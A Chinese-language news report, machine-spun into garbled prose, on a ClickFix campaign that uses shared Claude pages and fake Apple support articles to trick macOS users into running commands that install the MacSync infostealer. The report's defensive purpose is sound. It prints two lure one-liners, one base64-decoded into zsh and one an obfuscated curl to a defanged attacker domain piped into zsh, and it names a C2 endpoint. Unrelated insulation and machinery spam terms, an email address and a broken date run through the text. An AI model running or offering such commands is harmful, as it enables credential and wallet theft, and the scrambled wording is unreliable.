坏心分子正借助 Claude 分享内容与谷歌告鹤发起 ClickFix 挫折三明铝皮保温，向搜索特定要害词的 macOS 用户分发信息窃取类坏心软件。相干东说念主员已在郊外发现至少两种挫折变体，过 1 万名用户打听过包含危急指示的坏心内容。 

邮箱：215114768@qq.com

Claude 分享内容（Claude artifact）是指由用户通过 Anthropic 假话语模子生成并公开的内容，形式包括指示、教程、代码片断等。这类内容立于主对话界面，任何东说念主齐可通过 claude.ai 域名下的赓续径直打听。 

该类页面会领导用户：所展示内容由用户生成，未经准确考据。

相干东说念主员发现，在谷歌搜索中，"在线 DNS 流露器"" macOS 敕令行磁盘空间分析器用"" HomeBrew "等要害词均出现了坏心广着力。

坏心 HomeBrew 搜索着力三明铝皮保温

这些搜索着力会跳转到公开的 Claude 分享内容，或冒充苹果官救助的 Medium 著述。两种页面齐会诱用户在末端中粘贴并执行 Shell 敕令。 

种挫折变体诱执行的敕令为：

echo   "..."   |   base64   -D   |   zsh

二种为：

true   &&   cur""l   -SsLfk   --compressed   "https://raxelpak [ . ] com/curl/ [ hash ] "   |   zsh三明铝皮保温

二种挫折变体使用伪造苹果救助页面

相干东说念主员发现，该坏心 Claude 教程页面浏览量已至少达到 156 次，这数据可约莫响应上圈套用户领域。证实几天前不雅测到的该页面示，浏览量为 123 次。

Claude 对话中托管的 ClickFix 挫折引页面

在末端执行上述敕令后，系统会下载个 MacSync 信息窃取木马的加载器，用于窃取确立上的敏锐数据。

相干东说念主员暗示，设备保温施工该木马使用硬编码令与 API 密钥调理敕令与浪漫（C2）基础设施，并伪造 macOS 浏览器 UA 以伪装成往往流量。 

敕令执行着力会径直传递给 osascript，由 AppleScript 肃穆执行骨子的窃取看成，包括钥匙串、浏览器数据、加密货币钱包等信息。"  

窃取的数据会包为 /tmp/osalogging.zip，通过 HTTP POST 肯求上传至挫折者 C2 处事器 a2abotnet [ . ] com/gate。若传输失败，压缩包会被拆分为多个小块并重试 8 次。上传到手后，要知晓执行清算操作，抹除通盘陈迹。 

两种挫折变体均从同 C2 地址下载二阶段载荷，标明背后是同威迫组织所为。 此前已有访佛挫折举止专揽 ChatGPT、Grok 的对话分享分发 AMOS 信息窃取木马。225 年 12 月，相干东说念主员就发现挫折者专揽 ChatGPT 与 Grok 对话分享赓续，针对 macOS 用户发动 ClickFix 挫折。 

这次挫折运转铺张 Claude，标明大模子铺张已扩散至多主流平台。安全相干东说念主员提醒用户保抓严慎，不要在末端执行开首不解或法赓续的敕令。而在同对话中向聊天机器东说念主推敲敕令是否安全三明铝皮保温，是浅易有的判断法。

相关词条:设备保温     塑料挤出机厂家     预应力钢绞线    玻璃丝棉    万能胶厂家